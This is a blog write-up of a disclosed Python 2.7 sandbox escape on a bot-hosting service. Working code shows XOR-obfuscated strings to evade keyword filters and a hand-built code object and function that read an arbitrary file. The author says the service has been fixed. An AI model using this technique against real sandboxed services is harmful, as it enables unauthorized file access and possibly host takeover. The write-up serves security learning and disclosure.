Awhile ago, I stumbled upon a service that let you write python-bots to interact with a number of external services. The basic idea was that you only had to worry about your logic, and they would provide a wrapper around API's and take care of hosting the bot for a monthly fee.
Python "Jail" or sandbox escapes are fairly common in CTFs, and I knew that there are all sorts of "magical" ways of doing things in python, so I decided to poke around a bit. Sure enough, I found a way of circumventing the sandbox and getting (kind of) arbitrary python to run. I've since talked to the founder about this, and they've taken steps to mitigate the damage one could do, so I thought I'd talk about some real world python-chaos :).[Specifically, virtualization is used to protect the host system]. With the level of access I had, I'm fairly sure it was possible to get a shell, and from there, who knows...
The remainder of this post will describe the process of breaking out of the sandbox they set up. Everything was written/tested on python 2.7.6.
At face value, the service was stripped of most dangerous components fairly well:
- "Fun" modules could not be imported (sys, os, etc)
- "Fun" keywords/functions got your script thrown out (exec, open(), read(), compile(), etc)
- "Fun" attributes, nope! (myfunc.func_code)
- Fun stuff couldn't even be in static strings! (Annoying, but not really that important).
str1 = [30, 30, 35, 52, 40, 45, 53, 40, 47, 50, 30, 30] for i in range(0,len(str1)): str1[i] = chr(str1[i] ^ 0x41) str1 = ''.join(str1)That gets us around most of the basic string-matching, but it still doesn't let us do anything interesting. The rest of the exploit relies on code objects. If you're not familiar with them, this is a great overview
So, normally, python allows you to access all the guts of functions. A Function is basically a wrapper for a code-object, and (as the name implies) you can access and modify these objects as you like. The python interpreter acts as a sort of VM, fetching and executing bytecode found inside code-objects. Python bytecode is assembly-ish. You can take a look here if you want to play around
At first, its tempting to just try directly modifying a dummy function's bytecode. However, that requires accessing the "func_code" member, which is explicitly blocked. Additionally, just modifying bytecode wouldn't be enough. Fortunately, it /was/ possible to get access to a code-object.
cdbj = type(myfunc.__code__)
Now that we have a dummy code object, we can proceed to fill it in, and slide it into an empty function. The question at this point, is what do we fill it in with?
>>> dir(f.__code__) ['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__','__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__' , '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']
So, that looks a bit intimidating, but really, we're only interested in a few of these. Specifically, I used
- co_code: string of raw compiled bytecode
- co_consts: tuple of constants used in the bytecode
- co_names: tuple of names of local variables
I had an info-leak that gave me the path of an interesting file, so I wanted my bytecode to basically do: open(<filename).read().
You can inspect bytecode in a user-friendly-ish way by using the dis module. This makes it easier to understand the fields we'll be filling in.
import dis def read(): return open("./poc.py",'r').read() dis.dis(read.__code__) >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 28 0 LOAD_GLOBAL 0 (open) 3 LOAD_CONST 1 ('./poc.py') 6 LOAD_CONST 2 ('r') 9 CALL_FUNCTION 2 12 LOAD_ATTR 1 (read) 15 CALL_FUNCTION 0 18 RETURN_VALUENow, to actually access the bytecode that results in this:
bytecode = read.__code__.co_code print bytecode.encode('hex') >>> 7400006401006402008302006a010083000053This gives us all the necessary pieces to create our code object. We can slide in our values like this:
code = type(myfunc.__code__) #Get a Code Object bytecode = "7400006401006402008302006a010083000053".decode('hex') #Get our bytecode filename = "./poc.py" #Set our filename consts = (None,filename,'r') #Set up our constants names = ('open','read') #Set up our names #Slide our values into the code object. codeobj = code(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())Great! Now we've created a code object with our desired functionality, without using anything that would trigger alerts. The only thing left to do is finding a way to execute it! Thankfully, functions in python are quite malleable. You can read about all their attributes here.
First, we start off with an empty, "dummy" function, and obtain a variable of type "function" that we can modify.
def f(): pass function = type(f)Turns out there's one more major thing we need to do before we can slide in our code object. Python functions have a __globals__ attribute. This is described in the python documentation as:
Since the only thing we're worried about in our function is using the open() and read() built-in calls, we can create this dictionary easily enough.
A reference to the dictionary that holds the function’s global variables — the global namespace of the module in which the function was defined.
import __builtin__ mydict = {} mydict["__builtins__"] = __builtin__At this point, the only thing left to do is put all the pieces together. Using the "function" variable we created before:
return function(codeobj, mydict, None, None, None)
So, in conclusion, we've created a code object and devised a way of executing it. Obviously, it is possible to block a few more keywords and stop this attack from being possible, but it highlights the difficulty of getting this sort of thing right.
For some ideas of taking this to the next level, take a look at this CTF writeup that discusses using a read/write primitive to obtain shell-level remote code execution on the host system. Certainly something to keep in mind.
Actually getting this to execute on similar production environments will probably require a bit more obfuscation/creativity. However, I've put together an example script that ties together all the steps explained here into a simple package that you should be able to execute and play with locally. Enjoy! :)